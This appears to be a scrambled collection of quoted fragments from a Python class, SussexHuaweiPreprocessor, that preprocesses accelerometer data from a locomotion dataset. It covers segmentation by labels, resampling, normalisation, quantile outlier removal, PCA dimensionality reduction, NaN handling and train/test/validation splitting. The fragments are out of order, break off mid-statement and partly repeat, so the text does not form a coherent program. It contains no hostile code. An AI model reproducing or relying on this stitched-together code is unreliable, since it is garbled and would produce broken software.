#data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)", "self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments =", "valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = 
data_test_valid.head(test_len)", "road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time')", "replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode", "\"\"\" try: if data is None or target_columns is None or mode is", "# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] =", "None): \"\"\" Apply z-normalization to a data set. :param data: :param columns: :param", "or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns,", "ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next 7 lines of code", "= data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if", "date time. :param data: :param column: :param unit: :return: \"\"\" # Source: #", "unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted label. :param data: :param", "an encoding function. 
:param data: :param mode: :param columns: :param encoding_function: :return: \"\"\"", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns)", "replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz", "Remove segments that are too long or too short after splitting min_length_subsegements =", "or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is", "that have an unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\"", "if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None):", "#Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment", "data, target_columns, mode, args=None): \"\"\" Project accelerometer data from local vehicle coordinates to", "replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS Fresh", "# 1. 
Ensure index is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]'))", "os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative data.", "data.std() elif mean is not None and std is not None: if columns", ":param axis: :return: \"\"\" try: data = None for ind in range(len(data_segments)): if", "# https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name})", "reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names =", "label. 
:param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is", "#**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0:", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config,", "data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments", "selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile", "data set. 
:param data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\" try:", "in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate", "data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if mode == 'orientation':", "print('Convert time unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time',", "ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if mode", "data = (data - data.mean()) / data.std() elif mean is not None and", "pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides", "isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode ==", "data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len", "not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data))", "preprocessing steps necessary for inference. 
:param data: pandas.DataFrame :param params: List :return: pandas.DataFrame,", "!= len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "# to center around 0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError):", "is None: if columns is not None: mean = data[columns].mean() std = data[columns].std()", "self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train, mean_train, std_train, data_test, data_valid", ":param target_columns: :param mode: :param args: :return: \"\"\" try: if data is None", "pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns =", "Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for", "_, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode", "\"\"\" try: if data is None or replacement_mode is None or columns is", "pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index)", "pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns)", "DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): 
self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\"", "columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list)", "next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns:", "if not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns", "is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column]", "#3. 
Remove segments that are too long or too short after splitting min_length_subsegements", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines", ")[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train,", "'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label']", "Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in", "else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is", "self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0]", "\"\"\" Project accelerometer data from local vehicle coordinates to a global coordinate system.", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None,", "1 
grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for", "index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data =", "are too long or too short after splitting min_length_subsegements = [] for segment", "works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in", "def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a data set. :param", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select all data with desired", "return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "== 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "mode, label_column=None, args=None): \"\"\" Segements a time series based on a label column,", "a dimensionality reduction technique to a data set. :param data: :param mode: :param", "print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train =", "target_label] # 2. 
Split by non-subsequent indices # Source for next 3 lines", "data with desired label value data_segments = [] for target_label in args: selected_data", "label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test,", "columns, quantile = None, threshold = None): \"\"\" Removes outlieres either based on", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data", ":param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0],", "data is None or replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list): raise", "reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str)", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8", "= None, std = None): \"\"\" Apply z-normalization to a data set. 
:param", "@0.95 for classical approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test", "# https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_,", "label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels',", "in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for", "around 0.0 substract 0.5 else: data = (data - data.min()) / (data.max() -", "def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features using an encoding", "columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] #", "if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)):", "if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "@overrides def znormalize_quantitative_data(self, data, 
columns = None, mean = None, std = None):", "column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix", "import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data,", "if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN')", "+ 1, axis=0) # 1. Ensure index is datetime index and standardize type", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data,", "std = data.std() data = (data - data.mean()) / data.std() elif mean is", "pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in columns): raise", "config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit):", "Apply a dimensionality reduction technique to a data set. 
:param data: :param mode:", "code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0", "not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode", "if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str): raise", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data):", "mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. 
Segment data segments = split(data, segment_length) if not exact_length:", "* test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train,", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return data raise", "segments that are too long or too short after splitting min_length_subsegements = []", "= self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 #", "column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None:", "configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train =", "to a data set. :param data: :param columns: :param mean: :param std: :return:", "convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps to date time. 
:param", "if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode ==", ":param data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if data", "unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list)", "segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "# 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works", "data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True)", "time stamps to date time. :param data: :param column: :param unit: :return: \"\"\"", "= self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs'", "= (data[columns] - mean) / std else: data = (data - mean) /", "matrix. 
:param labels: :param data: :return: \"\"\" try: if data is None or", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self,", ":param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is None or replacement_mode", "removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data", "label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels',", "not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is", "# https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column] *", "short after splitting min_length_subsegements = [] for segment in segments: if segment.shape[0] ==", ":param columns: :param encoding_function: :return: \"\"\" try: if data is None or mode", "= config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z']", "and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels,", "data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data", "# 
https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is None", "quantitative data. :param data: :param freq: :param mode: :return: \"\"\" # Source: #", "center around 0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data", "#Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train,", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data,", "mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is", "'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity':", "[group for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments", "data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind 
in", "mode: :param label_column: :param args: :return: \"\"\" try: if data is None or", "ReplacementValReplacementStrategy from overrides import overrides import traceback import os import pandas from sklearn.decomposition", "- data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1 != len(args): raise", "column, unit): \"\"\" Converts unix time stamps to date time. :param data: :param", "pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz", "is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments", "car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in", "target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name", "config, labels): \"\"\" Apply all preprocessing steps necessary for training. :param data: pandas.DataFrame", "with desired label value data_segments = [] for target_label in args: selected_data =", "= data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind", "data: :param columns: :param mean: :param std: :return: \"\"\" try: if data is", "freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined = segment else: segments_combined", "str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps necessary for inference. 
:param", "based on quantile or a threshold value. :param data: :param replacement_mode: :param columns:", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\"", "data_train_segments = [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self,", "= [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels )", "pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode", "MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides", "return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid", "from overrides import overrides import traceback import os import pandas from sklearn.decomposition import", "data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') 
#data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1,", "args: :return: \"\"\" try: if data is None or mode is None: raise", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source", "not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns, list): raise", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels vector", "[] for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate:", "target_label in args: selected_data = data[data[label_column] == target_label] # 2. Split by non-subsequent", "super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time series", "\"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms'", "data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced',", "import pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__()", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self,", "'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as value if replacment_mode is", "index is datetime index and standardize type data.index = 
pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data", "and data matrix. :param labels: :param data: :return: \"\"\" try: if data is", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self,", "rows that have an unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return:", "either based on quantile or a threshold value. :param data: :param replacement_mode: :param", "data, mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply a dimensionality reduction", "classical approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:,", "data_len = data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len * train_sz)", "raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "or replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "== 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length = args[2] segments_aggregated =", "None or replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, 
